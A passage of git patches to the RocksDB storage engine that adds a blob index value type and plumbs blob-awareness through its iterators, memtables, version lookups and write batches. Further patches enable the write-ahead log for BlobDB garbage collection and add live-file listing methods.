"rocksdb::blob_db::BlobDB instead."); + } else { + status_ = + Status::NotSupported("Blob DB does not support merge operator."); + } + valid_ = false; + return true; } else { assert(last_not_merge_type == kTypeValue); s = MergeHelper::TimedFullMerge( @@ -816,6 +860,17 @@ bool DBIter::FindValueForCurrentKey() { case kTypeValue: // do nothing - we've already has value in saved_value_ break; + case kTypeBlobIndex: + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + valid_ = false; + return true; + } + is_blob_ = true; + break; default: assert(false); break; @@ -849,7 +904,15 @@ bool DBIter::FindValueForCurrentKeyUsingSeek() { valid_ = false; return false; } - if (ikey.type == kTypeValue) { + if (ikey.type == kTypeBlobIndex && !allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. 
Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + valid_ = false; + return true; + } + if (ikey.type == kTypeValue || ikey.type == kTypeBlobIndex) { assert(iter_->IsValuePinned()); pinned_value_ = iter_->value(); valid_ = true; @@ -1160,10 +1223,11 @@ Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations) { - DBIter* db_iter = new DBIter(env, read_options, cf_options, - user_key_comparator, internal_iter, sequence, - false, max_sequential_skip_in_iterations); + uint64_t max_sequential_skip_in_iterations, + bool allow_blob) { + DBIter* db_iter = new DBIter( + env, read_options, cf_options, user_key_comparator, internal_iter, + sequence, false, max_sequential_skip_in_iterations, allow_blob); return db_iter; } @@ -1191,6 +1255,7 @@ inline void ArenaWrappedDBIter::Prev() { db_iter_->Prev(); } inline Slice ArenaWrappedDBIter::key() const { return db_iter_->key(); } inline Slice ArenaWrappedDBIter::value() const { return db_iter_->value(); } inline Status ArenaWrappedDBIter::status() const { return db_iter_->status(); } +bool ArenaWrappedDBIter::IsBlob() const { return db_iter_->IsBlob(); } inline Status ArenaWrappedDBIter::GetProperty(std::string prop_name, std::string* prop) { if (prop_name == "rocksdb.iterator.super-version-number") { @@ -1207,11 +1272,11 @@ void ArenaWrappedDBIter::Init(Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iteration, - uint64_t version_number) { + uint64_t version_number, bool allow_blob) { auto mem = arena_.AllocateAligned(sizeof(DBIter)); db_iter_ = new (mem) DBIter(env, read_options, cf_options, cf_options.user_comparator, nullptr, - sequence, true, max_sequential_skip_in_iteration); + sequence, true, max_sequential_skip_in_iteration, allow_blob); sv_number_ = version_number; } @@ -1231,7 +1296,7 @@ Status ArenaWrappedDBIter::Refresh() { SuperVersion* sv = cfd_->GetReferencedSuperVersion(db_impl_->mutex()); Init(env, read_options_, *(cfd_->ioptions()), latest_seq, sv->mutable_cf_options.max_sequential_skip_in_iterations, - cur_sv_number); + cur_sv_number, allow_blob_); InternalIterator* internal_iter = db_impl_->NewInternalIterator( read_options_, cfd_, sv, &arena_, db_iter_->GetRangeDelAggregator()); @@ -1247,12 +1312,12 @@ ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, uint64_t version_number, - DBImpl* db_impl, ColumnFamilyData* cfd) { + DBImpl* db_impl, ColumnFamilyData* cfd, bool allow_blob) { ArenaWrappedDBIter* iter = new ArenaWrappedDBIter(); iter->Init(env, read_options, cf_options, sequence, - max_sequential_skip_in_iterations, version_number); + max_sequential_skip_in_iterations, version_number, allow_blob); if (db_impl != nullptr && cfd != nullptr) { - iter->StoreRefreshInfo(read_options, db_impl, cfd); + iter->StoreRefreshInfo(read_options, db_impl, cfd, allow_blob); } return iter; diff --git a/db/db_iter.h b/db/db_iter.h index ea98ff4332a..26fcd44cbd2 100644 --- a/db/db_iter.h +++ b/db/db_iter.h @@ -33,7 +33,8 @@ extern Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t 
max_sequential_skip_in_iterations); + uint64_t max_sequential_skip_in_iterations, + bool allow_blob = false); // A wrapper iterator which wraps DB Iterator and the arena, with which the DB // iterator is supposed be allocated. This class is used as an entry point of @@ -63,20 +64,22 @@ class ArenaWrappedDBIter : public Iterator { virtual Slice value() const override; virtual Status status() const override; virtual Status Refresh() override; + bool IsBlob() const; virtual Status GetProperty(std::string prop_name, std::string* prop) override; void Init(Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations, - uint64_t version_number); + uint64_t max_sequential_skip_in_iterations, uint64_t version_number, + bool allow_blob); void StoreRefreshInfo(const ReadOptions& read_options, DBImpl* db_impl, - ColumnFamilyData* cfd) { + ColumnFamilyData* cfd, bool allow_blob) { read_options_ = read_options; db_impl_ = db_impl; cfd_ = cfd; + allow_blob_ = allow_blob; } private: @@ -86,6 +89,7 @@ class ArenaWrappedDBIter : public Iterator { ColumnFamilyData* cfd_ = nullptr; DBImpl* db_impl_ = nullptr; ReadOptions read_options_; + bool allow_blob_ = false; }; // Generate the arena wrapped iterator class. @@ -95,6 +99,7 @@ extern ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, uint64_t version_number, - DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr); + DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr, + bool allow_blob = false); } // namespace rocksdb diff --git a/db/dbformat.cc b/db/dbformat.cc index 20c54495aa0..f287ae9f4e0 100644 --- a/db/dbformat.cc +++ b/db/dbformat.cc @@ -27,7 +27,7 @@ namespace rocksdb { // and the value type is embedded as the low 8 bits in the sequence // number in internal keys, we need to use the highest-numbered // ValueType, not the lowest). -const ValueType kValueTypeForSeek = kTypeSingleDeletion; +const ValueType kValueTypeForSeek = kTypeBlobIndex; const ValueType kValueTypeForSeekForPrev = kTypeDeletion; uint64_t PackSequenceAndType(uint64_t seq, ValueType t) { diff --git a/db/dbformat.h b/db/dbformat.h index d9fd5f3997b..c58b8363ab5 100644 --- a/db/dbformat.h +++ b/db/dbformat.h @@ -47,6 +47,8 @@ enum ValueType : unsigned char { kTypeNoop = 0xD, // WAL only. kTypeColumnFamilyRangeDeletion = 0xE, // WAL only. kTypeRangeDeletion = 0xF, // meta block + kTypeColumnFamilyBlobIndex = 0x10, // Blob DB only + kTypeBlobIndex = 0x11, // Blob DB only kMaxValue = 0x7F // Not used for storing records. }; @@ -57,7 +59,7 @@ extern const ValueType kValueTypeForSeekForPrev; // Checks whether a type is an inline value type // (i.e. a type used in memtable skiplist and sst file datablock). 
inline bool IsValueType(ValueType t) { - return t <= kTypeMerge || t == kTypeSingleDeletion; + return t <= kTypeMerge || t == kTypeSingleDeletion || t == kTypeBlobIndex; } // Checks whether a type is from user operation diff --git a/db/memtable.cc b/db/memtable.cc index 9f2fd20bb50..22b4125e075 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -555,6 +555,7 @@ struct Saver { Statistics* statistics; bool inplace_update_support; Env* env_; + bool* is_blob_index; }; } // namespace @@ -584,11 +585,26 @@ static bool SaveValue(void* arg, const char* entry) { ValueType type; UnPackSequenceAndType(tag, &s->seq, &type); - if ((type == kTypeValue || type == kTypeMerge) && + if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) && range_del_agg->ShouldDelete(Slice(key_ptr, key_length))) { type = kTypeRangeDeletion; } switch (type) { + case kTypeBlobIndex: + if (s->is_blob_index == nullptr) { + ROCKS_LOG_ERROR(s->logger, "Encounter unexpected blob index."); + *(s->status) = Status::NotSupported( + "Encounter unsupported blob value. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + } else if (*(s->merge_in_progress)) { + *(s->status) = + Status::NotSupported("Blob DB does not support merge operator."); + } + if (!s->status->ok()) { + *(s->found_final_value) = true; + return false; + } + // intentional fallthrough case kTypeValue: { if (s->inplace_update_support) { s->mem->GetLock(s->key->user_key())->ReadLock(); @@ -607,6 +623,9 @@ static bool SaveValue(void* arg, const char* entry) { s->mem->GetLock(s->key->user_key())->ReadUnlock(); } *(s->found_final_value) = true; + if (s->is_blob_index != nullptr) { + *(s->is_blob_index) = (type == kTypeBlobIndex); + } return false; } case kTypeDeletion: @@ -653,7 +672,7 @@ static bool SaveValue(void* arg, const char* entry) { bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, SequenceNumber* seq, - const ReadOptions& read_opts) { + const ReadOptions& read_opts, bool* is_blob_index) { // The sequence number is updated synchronously in version_set.h if (IsEmpty()) { // Avoiding recording stats for speed. @@ -699,6 +718,7 @@ bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, saver.inplace_update_support = moptions_.inplace_update_support; saver.statistics = moptions_.statistics; saver.env_ = env_; + saver.is_blob_index = is_blob_index; table_->Get(key, &saver, SaveValue); *seq = saver.seq; diff --git a/db/memtable.h b/db/memtable.h index 9669a2157c4..89679248425 100644 --- a/db/memtable.h +++ b/db/memtable.h @@ -187,13 +187,15 @@ class MemTable { // status returned indicates a corruption or other unexpected error. 
   bool Get(const LookupKey& key, std::string* value, Status* s,
            MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           SequenceNumber* seq, const ReadOptions& read_opts);
+           SequenceNumber* seq, const ReadOptions& read_opts,
+           bool* is_blob_index = nullptr);
 
   bool Get(const LookupKey& key, std::string* value, Status* s,
            MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           const ReadOptions& read_opts) {
+           const ReadOptions& read_opts, bool* is_blob_index = nullptr) {
     SequenceNumber seq;
-    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts);
+    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts,
+               is_blob_index);
   }
 
   // Attempts to update the new_value inplace, else does normal Add
diff --git a/db/memtable_list.cc b/db/memtable_list.cc
index c9a927c062f..a9d9e1c0226 100644
--- a/db/memtable_list.cc
+++ b/db/memtable_list.cc
@@ -104,10 +104,10 @@ int MemTableList::NumFlushed() const {
 bool MemTableListVersion::Get(const LookupKey& key, std::string* value,
                               Status* s, MergeContext* merge_context,
                               RangeDelAggregator* range_del_agg,
-                              SequenceNumber* seq,
-                              const ReadOptions& read_opts) {
+                              SequenceNumber* seq, const ReadOptions& read_opts,
+                              bool* is_blob_index) {
   return GetFromList(&memlist_, key, value, s, merge_context, range_del_agg,
-                     seq, read_opts);
+                     seq, read_opts, is_blob_index);
 }
 
 bool MemTableListVersion::GetFromHistory(const LookupKey& key,
@@ -120,19 +120,17 @@ bool MemTableListVersion::GetFromHistory(const LookupKey& key,
                          range_del_agg, seq, read_opts);
 }
 
-bool MemTableListVersion::GetFromList(std::list<MemTable*>* list,
-                                      const LookupKey& key, std::string* value,
-                                      Status* s, MergeContext* merge_context,
-                                      RangeDelAggregator* range_del_agg,
-                                      SequenceNumber* seq,
-                                      const ReadOptions& read_opts) {
+bool MemTableListVersion::GetFromList(
+    std::list<MemTable*>* list, const LookupKey& key, std::string* value,
+    Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg,
+    SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) {
   *seq = kMaxSequenceNumber;
 
   for (auto& memtable : *list) {
     SequenceNumber current_seq = kMaxSequenceNumber;
 
     bool done = memtable->Get(key, value, s, merge_context, range_del_agg,
-                              &current_seq, read_opts);
+                              &current_seq, read_opts, is_blob_index);
     if (*seq == kMaxSequenceNumber) {
       // Store the most recent sequence number of any operation on this key.
       // Since we only care about the most recent change, we only need to
diff --git a/db/memtable_list.h b/db/memtable_list.h
index 628ab544b6c..23b5bbe558b 100644
--- a/db/memtable_list.h
+++ b/db/memtable_list.h
@@ -54,13 +54,15 @@ class MemTableListVersion {
   // returned). Otherwise, *seq will be set to kMaxSequenceNumber.
   bool Get(const LookupKey& key, std::string* value, Status* s,
            MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           SequenceNumber* seq, const ReadOptions& read_opts);
+           SequenceNumber* seq, const ReadOptions& read_opts,
+           bool* is_blob_index = nullptr);
 
   bool Get(const LookupKey& key, std::string* value, Status* s,
            MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           const ReadOptions& read_opts) {
+           const ReadOptions& read_opts, bool* is_blob_index = nullptr) {
     SequenceNumber seq;
-    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts);
+    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts,
+               is_blob_index);
   }
 
   // Similar to Get(), but searches the Memtable history of memtables that
@@ -117,7 +119,7 @@ class MemTableListVersion {
   bool GetFromList(std::list<MemTable*>* list, const LookupKey& key,
                    std::string* value, Status* s, MergeContext* merge_context,
                    RangeDelAggregator* range_del_agg, SequenceNumber* seq,
-                   const ReadOptions& read_opts);
+                   const ReadOptions& read_opts, bool* is_blob_index = nullptr);
 
   void AddMemTable(MemTable* m);
diff --git a/db/version_set.cc b/db/version_set.cc
index 2ff425d2019..782ebc263eb 100644
--- a/db/version_set.cc
+++ b/db/version_set.cc
@@ -965,7 +965,7 @@ void Version::Get(const ReadOptions& read_options, const LookupKey& k,
                   PinnableSlice* value, Status* status,
                   MergeContext* merge_context,
                   RangeDelAggregator* range_del_agg, bool* value_found,
-                  bool* key_exists, SequenceNumber* seq) {
+                  bool* key_exists, SequenceNumber* seq, bool* is_blob) {
   Slice ikey = k.internal_key();
   Slice user_key = k.user_key();
 
@@ -981,7 +981,7 @@ void Version::Get(const ReadOptions& read_options, const LookupKey& k,
       user_comparator(), merge_operator_, info_log_, db_statistics_,
       status->ok() ? GetContext::kNotFound : GetContext::kMerge, user_key,
       value, value_found, merge_context, range_del_agg, this->env_, seq,
-      merge_operator_ ? &pinned_iters_mgr : nullptr);
+      merge_operator_ ? &pinned_iters_mgr : nullptr, is_blob);
 
   // Pin blocks that we read to hold merge operands
   if (merge_operator_) {
@@ -1030,6 +1030,12 @@ void Version::Get(const ReadOptions& read_options, const LookupKey& k,
         return;
       case GetContext::kMerge:
         break;
+      case GetContext::kBlobIndex:
+        ROCKS_LOG_ERROR(info_log_, "Encounter unexpected blob index.");
+        *status = Status::NotSupported(
+            "Encounter unexpected blob index. Please open DB with "
+            "rocksdb::blob_db::BlobDB instead.");
+        return;
     }
     f = fp.GetNextFile();
   }
diff --git a/db/version_set.h b/db/version_set.h
index 9fb000c058b..5862dea3350 100644
--- a/db/version_set.h
+++ b/db/version_set.h
@@ -485,7 +485,8 @@ class Version {
   void Get(const ReadOptions&, const LookupKey& key, PinnableSlice* value,
            Status* status, MergeContext* merge_context,
            RangeDelAggregator* range_del_agg, bool* value_found = nullptr,
-           bool* key_exists = nullptr, SequenceNumber* seq = nullptr);
+           bool* key_exists = nullptr, SequenceNumber* seq = nullptr,
+           bool* is_blob = nullptr);
 
   // Loads some stats information from files. Call without mutex held. It needs
   // to be called before applying the version to the version set.
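Taken together, the hunks above thread a single `is_blob_index` out-parameter from `MemTable::Get` through `MemTableListVersion::Get` and `Version::Get` up to `DBImpl::GetImpl`. A minimal caller-side sketch of the intended contract follows; `BlobAwareGet` and `ResolveBlobIndex` are hypothetical names for illustration, not functions added by this patch:

// Sketch only: how a blob-aware wrapper (e.g. BlobDB) would consume the new
// out-parameter. GetImpl() is private to DBImpl; the test fixture reaches it
// through the friend declarations added to db_impl.h, and this hypothetical
// helper assumes the same kind of access.
Status BlobAwareGet(DBImpl* db, const ReadOptions& read_options,
                    ColumnFamilyHandle* cfh, const Slice& key,
                    PinnableSlice* value) {
  bool is_blob_index = false;
  // Passing a non-null pointer makes GetImpl() return a kTypeBlobIndex
  // entry as-is and set the flag, instead of failing with NotSupported.
  Status s = db->GetImpl(read_options, cfh, key, value,
                         nullptr /* value_found */, &is_blob_index);
  if (!s.ok() || !is_blob_index) {
    return s;  // plain value, not-found, or error: nothing more to do
  }
  // *value now holds an encoded blob index; decoding it and reading the
  // actual value from the blob file is left to the (hypothetical) helper.
  return ResolveBlobIndex(*value, value);
}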
diff --git a/db/write_batch.cc b/db/write_batch.cc index 43639ac2320..89ae044c8b2 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -67,6 +67,7 @@ enum ContentFlags : uint32_t { HAS_COMMIT = 1 << 7, HAS_ROLLBACK = 1 << 8, HAS_DELETE_RANGE = 1 << 9, + HAS_BLOB_INDEX = 1 << 10, }; struct BatchContentClassifier : public WriteBatch::Handler { @@ -97,6 +98,11 @@ struct BatchContentClassifier : public WriteBatch::Handler { return Status::OK(); } + Status PutBlobIndexCF(uint32_t, const Slice&, const Slice&) override { + content_flags |= ContentFlags::HAS_BLOB_INDEX; + return Status::OK(); + } + Status MarkBeginPrepare() override { content_flags |= ContentFlags::HAS_BEGIN_PREPARE; return Status::OK(); @@ -328,6 +334,17 @@ Status ReadRecordFromWriteBatch(Slice* input, char* tag, return Status::Corruption("bad WriteBatch Merge"); } break; + case kTypeColumnFamilyBlobIndex: + if (!GetVarint32(input, column_family)) { + return Status::Corruption("bad WriteBatch BlobIndex"); + } + // intentional fallthrough + case kTypeBlobIndex: + if (!GetLengthPrefixedSlice(input, key) || + !GetLengthPrefixedSlice(input, value)) { + return Status::Corruption("bad WriteBatch BlobIndex"); + } + break; case kTypeLogData: assert(blob != nullptr); if (!GetLengthPrefixedSlice(input, blob)) { @@ -414,6 +431,13 @@ Status WriteBatch::Iterate(Handler* handler) const { s = handler->MergeCF(column_family, key, value); found++; break; + case kTypeColumnFamilyBlobIndex: + case kTypeBlobIndex: + assert(content_flags_.load(std::memory_order_relaxed) & + (ContentFlags::DEFERRED | ContentFlags::HAS_BLOB_INDEX)); + s = handler->PutBlobIndexCF(column_family, key, value); + found++; + break; case kTypeLogData: handler->LogData(blob); break; @@ -759,6 +783,25 @@ Status WriteBatch::Merge(ColumnFamilyHandle* column_family, value); } +Status WriteBatchInternal::PutBlobIndex(WriteBatch* b, + uint32_t column_family_id, + const Slice& key, const Slice& value) { + LocalSavePoint save(b); + WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1); + if (column_family_id == 0) { + b->rep_.push_back(static_cast(kTypeBlobIndex)); + } else { + b->rep_.push_back(static_cast(kTypeColumnFamilyBlobIndex)); + PutVarint32(&b->rep_, column_family_id); + } + PutLengthPrefixedSlice(&b->rep_, key); + PutLengthPrefixedSlice(&b->rep_, value); + b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) | + ContentFlags::HAS_BLOB_INDEX, + std::memory_order_relaxed); + return save.commit(); +} + Status WriteBatch::PutLogData(const Slice& blob) { LocalSavePoint save(this); rep_.push_back(static_cast(kTypeLogData)); @@ -935,8 +978,8 @@ class MemTableInserter : public WriteBatch::Handler { return true; } - virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + Status PutCFImpl(uint32_t column_family_id, const Slice& key, + const Slice& value, ValueType value_type) { if (rebuilding_trx_ != nullptr) { WriteBatchInternal::Put(rebuilding_trx_, column_family_id, key, value); return Status::OK(); @@ -951,7 +994,7 @@ class MemTableInserter : public WriteBatch::Handler { MemTable* mem = cf_mems_->GetMemTable(); auto* moptions = mem->GetMemTableOptions(); if (!moptions->inplace_update_support) { - mem->Add(sequence_, kTypeValue, key, value, concurrent_memtable_writes_, + mem->Add(sequence_, value_type, key, value, concurrent_memtable_writes_, get_post_process_info(mem)); } else if (moptions->inplace_callback == nullptr) { assert(!concurrent_memtable_writes_); @@ -986,11 +1029,11 @@ class 
MemTableInserter : public WriteBatch::Handler { value, &merged_value); if (status == UpdateStatus::UPDATED_INPLACE) { // prev_value is updated in-place with final value. - mem->Add(sequence_, kTypeValue, key, Slice(prev_buffer, prev_size)); + mem->Add(sequence_, value_type, key, Slice(prev_buffer, prev_size)); RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN); } else if (status == UpdateStatus::UPDATED) { // merged_value contains the final value. - mem->Add(sequence_, kTypeValue, key, Slice(merged_value)); + mem->Add(sequence_, value_type, key, Slice(merged_value)); RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN); } } @@ -1003,6 +1046,11 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } + virtual Status PutCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { + return PutCFImpl(column_family_id, key, value, kTypeValue); + } + Status DeleteImpl(uint32_t column_family_id, const Slice& key, const Slice& value, ValueType delete_type) { MemTable* mem = cf_mems_->GetMemTable(); @@ -1159,6 +1207,12 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } + virtual Status PutBlobIndexCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { + // Same as PutCF except for value type. + return PutCFImpl(column_family_id, key, value, kTypeBlobIndex); + } + void CheckMemtableFull() { if (flush_scheduler_ != nullptr) { auto* cfd = cf_mems_->current(); diff --git a/db/write_batch_internal.h b/db/write_batch_internal.h index 48a417ce877..2408686f12b 100644 --- a/db/write_batch_internal.h +++ b/db/write_batch_internal.h @@ -99,6 +99,9 @@ class WriteBatchInternal { static Status Merge(WriteBatch* batch, uint32_t column_family_id, const SliceParts& key, const SliceParts& value); + static Status PutBlobIndex(WriteBatch* batch, uint32_t column_family_id, + const Slice& key, const Slice& value); + static Status MarkEndPrepare(WriteBatch* batch, const Slice& xid); static Status MarkRollback(WriteBatch* batch, const Slice& xid); diff --git a/include/rocksdb/listener.h b/include/rocksdb/listener.h index 40d318e0941..e132033db2a 100644 --- a/include/rocksdb/listener.h +++ b/include/rocksdb/listener.h @@ -206,6 +206,7 @@ class CompactionEventListener { kDelete, kSingleDelete, kRangeDelete, + kBlobIndex, kInvalid, }; diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h index 8bd93d36c4e..336391ead56 100644 --- a/include/rocksdb/write_batch.h +++ b/include/rocksdb/write_batch.h @@ -233,6 +233,12 @@ class WriteBatch : public WriteBatchBase { } virtual void Merge(const Slice& /*key*/, const Slice& /*value*/) {} + virtual Status PutBlobIndexCF(uint32_t /*column_family_id*/, + const Slice& /*key*/, + const Slice& /*value*/) { + return Status::InvalidArgument("PutBlobIndexCF not implemented"); + } + // The default implementation of LogData does nothing. 
virtual void LogData(const Slice& blob); diff --git a/table/get_context.cc b/table/get_context.cc index 0d688fe4609..258891ec4c3 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -33,14 +33,12 @@ void appendToReplayLog(std::string* replay_log, ValueType type, Slice value) { } // namespace -GetContext::GetContext(const Comparator* ucmp, - const MergeOperator* merge_operator, Logger* logger, - Statistics* statistics, GetState init_state, - const Slice& user_key, PinnableSlice* pinnable_val, - bool* value_found, MergeContext* merge_context, - RangeDelAggregator* _range_del_agg, Env* env, - SequenceNumber* seq, - PinnedIteratorsManager* _pinned_iters_mgr) +GetContext::GetContext( + const Comparator* ucmp, const MergeOperator* merge_operator, Logger* logger, + Statistics* statistics, GetState init_state, const Slice& user_key, + PinnableSlice* pinnable_val, bool* value_found, MergeContext* merge_context, + RangeDelAggregator* _range_del_agg, Env* env, SequenceNumber* seq, + PinnedIteratorsManager* _pinned_iters_mgr, bool* is_blob_index) : ucmp_(ucmp), merge_operator_(merge_operator), logger_(logger), @@ -54,7 +52,8 @@ GetContext::GetContext(const Comparator* ucmp, env_(env), seq_(seq), replay_log_(nullptr), - pinned_iters_mgr_(_pinned_iters_mgr) { + pinned_iters_mgr_(_pinned_iters_mgr), + is_blob_index_(is_blob_index) { if (seq_) { *seq_ = kMaxSequenceNumber; } @@ -99,13 +98,19 @@ bool GetContext::SaveValue(const ParsedInternalKey& parsed_key, auto type = parsed_key.type; // Key matches. Process it - if ((type == kTypeValue || type == kTypeMerge) && + if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) && range_del_agg_ != nullptr && range_del_agg_->ShouldDelete(parsed_key)) { type = kTypeRangeDeletion; } switch (type) { case kTypeValue: + case kTypeBlobIndex: assert(state_ == kNotFound || state_ == kMerge); + if (type == kTypeBlobIndex && is_blob_index_ == nullptr) { + // Blob value not supported. Stop. 
+ state_ = kBlobIndex; + return false; + } if (kNotFound == state_) { state_ = kFound; if (LIKELY(pinnable_val_ != nullptr)) { @@ -131,6 +136,9 @@ bool GetContext::SaveValue(const ParsedInternalKey& parsed_key, } } } + if (is_blob_index_ != nullptr) { + *is_blob_index_ = (type == kTypeBlobIndex); + } return false; case kTypeDeletion: diff --git a/table/get_context.h b/table/get_context.h index ac50680b645..a708f6be745 100644 --- a/table/get_context.h +++ b/table/get_context.h @@ -22,7 +22,8 @@ class GetContext { kFound, kDeleted, kCorrupt, - kMerge // saver contains the current merge result (the operands) + kMerge, // saver contains the current merge result (the operands) + kBlobIndex, }; GetContext(const Comparator* ucmp, const MergeOperator* merge_operator, @@ -30,7 +31,8 @@ class GetContext { const Slice& user_key, PinnableSlice* value, bool* value_found, MergeContext* merge_context, RangeDelAggregator* range_del_agg, Env* env, SequenceNumber* seq = nullptr, - PinnedIteratorsManager* _pinned_iters_mgr = nullptr); + PinnedIteratorsManager* _pinned_iters_mgr = nullptr, + bool* is_blob_index = nullptr); void MarkKeyMayExist(); @@ -83,6 +85,7 @@ class GetContext { // Used to temporarily pin blocks when state_ == GetContext::kMerge PinnedIteratorsManager* pinned_iters_mgr_; bool sample_; + bool* is_blob_index_; }; void replayGetContextLog(const Slice& replay_log, const Slice& user_key, diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 6e8c9af4bb0..3918941cfc0 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -806,7 +806,7 @@ TEST_F(BlobDBTest, ReadWhileGC) { TEST_F(BlobDBTest, ColumnFamilyNotSupported) { Options options; options.env = mock_env_.get(); - mock_env_->set_now_micros(0); + mock_env_->set_current_time(0); Open(BlobDBOptions(), options); ColumnFamilyHandle *default_handle = blob_db_->DefaultColumnFamily(); ColumnFamilyHandle *handle = nullptr; From 8cff6e9456f53d9a07bdb2704643a03672195e39 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 6 Oct 2017 10:53:46 -0700 Subject: [PATCH 171/205] Enable WAL for blob index Summary: Enabled WAL, during GC, for blob index which is stored on regular RocksDB. Closes https://github.com/facebook/rocksdb/pull/2975 Differential Revision: D5997384 Pulled By: sagar0 fbshipit-source-id: b76c1487d8b5be0e36c55e8d77ffe3d37d63d85b --- utilities/blob_db/blob_db_impl.cc | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 777018aef15..60c91e8ac5a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1738,16 +1738,6 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, static const WriteOptions kGarbageCollectionWriteOptions = []() { WriteOptions write_options; - // TODO(yiwu): Disable WAL for garbage colection to make it compatible with - // use cases that don't use WAL. However without WAL there are at least - // two issues with crash: - // 1. If a key is dropped from blob file (e.g. due to TTL), right before a - // crash, the key may still presents in LSM after restart. - // 2. If a key is relocated to another blob file, right before a crash, - // after restart the new offset may be lost with the old offset pointing - // to the removed blob file. - // We need to have better recovery mechanism to address these issues. - write_options.disableWAL = true; // It is ok to ignore column families that were dropped. 
   write_options.ignore_missing_column_families = true;
   return write_options;

From 3747361235127f2f0a1fc8a3ee7d64e67c1bee1b Mon Sep 17 00:00:00 2001
From: Zhongyi Xie
Date: Mon, 9 Oct 2017 19:44:39 -0700
Subject: [PATCH 172/205] add GetLiveFiles and GetLiveFilesMetaData for BlobDB

Summary: Closes https://github.com/facebook/rocksdb/pull/2976

Differential Revision: D5994759

Pulled By: miasantreble

fbshipit-source-id: 985c31dccb957cb970c302f813cd07a1e8cb6438
---
 utilities/blob_db/blob_db_impl.cc | 33 +++++++++++++++++++++++++++++++
 utilities/blob_db/blob_db_impl.h  |  6 ++++++
 utilities/blob_db/blob_db_test.cc | 24 ++++++++++++++++++++
 3 files changed, 63 insertions(+)

diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc
index 60c91e8ac5a..ea3e38985fe 100644
--- a/utilities/blob_db/blob_db_impl.cc
+++ b/utilities/blob_db/blob_db_impl.cc
@@ -948,6 +948,39 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) {
   return Status::OK();
 }
 
+Status BlobDBImpl::GetLiveFiles(std::vector<std::string>& ret,
+                                uint64_t* manifest_file_size,
+                                bool flush_memtable) {
+  // Hold a lock in the beginning to avoid updates to base DB during the call
+  ReadLock rl(&mutex_);
+  Status s = db_->GetLiveFiles(ret, manifest_file_size, flush_memtable);
+  if (!s.ok()) {
+    return s;
+  }
+  ret.reserve(ret.size() + blob_files_.size());
+  for (auto bfile_pair : blob_files_) {
+    auto blob_file = bfile_pair.second;
+    ret.emplace_back(blob_file->PathName());
+  }
+  return Status::OK();
+}
+
+void BlobDBImpl::GetLiveFilesMetaData(std::vector<LiveFileMetaData>* metadata) {
+  // Hold a lock in the beginning to avoid updates to base DB during the call
+  ReadLock rl(&mutex_);
+  db_->GetLiveFilesMetaData(metadata);
+  for (auto bfile_pair : blob_files_) {
+    auto blob_file = bfile_pair.second;
+    LiveFileMetaData filemetadata;
+    filemetadata.size = blob_file->GetFileSize();
